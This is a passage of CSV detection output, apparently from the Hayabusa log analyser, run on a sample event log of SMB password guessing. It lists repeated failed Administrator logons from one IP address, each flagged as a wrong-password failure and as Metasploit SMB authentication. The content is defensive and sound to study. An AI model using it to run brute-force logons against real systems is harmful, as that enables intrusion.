Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kL9MdVnRVogiP7hF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aQ0hRdwZvC5PBcXl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ctbv73J0Dot9raD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wKpWApJIKkjbtaPB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kVTAv9VoNpUyxQFM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xb3t1dpuk9JZri5p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fy0UrW8TWrxAOX90 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iUXUbUsiE6Ahh9iD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2QQdQ6rQYLBf15AF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zG4eJLuQ4u2dKQG0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCfwHs2gVGiRc3Fy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 67TcwQfTxgTtQvCU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: imnSPKAKYzrCKSUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mMNbdjiXNUY0gTfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zOAH0gjfs8JcXSMO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TnnB4KPBiDvKMsUL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aZRgpa5riqIEWhQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBL4nrs7f6cjlfsT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fgDupzqipe5jK0r5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5yPcTOWPuN8efJtl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dszb6s0w6glvSkSw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ynu936pVVAuDUGT5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c55o3Dca2tiUVwb2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tnDmp2KK02LyJ7Xm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRUKrHDAmgEPcjQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PCGKDvPhzg6BlsuU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OU28biGLJkFmB117 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 029LphuWcoo9S2hL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItIROqP2wyzLJa9s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XngGun3HYopTkcrA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c91Qz5QNUczcm7m6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7nyWJJJhDiqnf1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bnj7hAp20gZE9FCe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FydQjBxO7XninU5Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3P8InIzyD86BXr1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wvKGa3A3qw7s0cZX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QTY7tRVEMjXZXFyH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m4Ij1NSYGYbq4PxS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 47fOxZAYhjxLzEoU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aGxXaNNChVScbHe6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jTcVeB8f2Rs3Bldo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeSnUlIbuDVNffey : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eXIM4tWru1x0AahJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m2pBLn6aO8L4kiH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EG5daDsgTMZsNg0T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3V8z6j7GLO3ywBXc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AsezMvhUNedLNqg4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 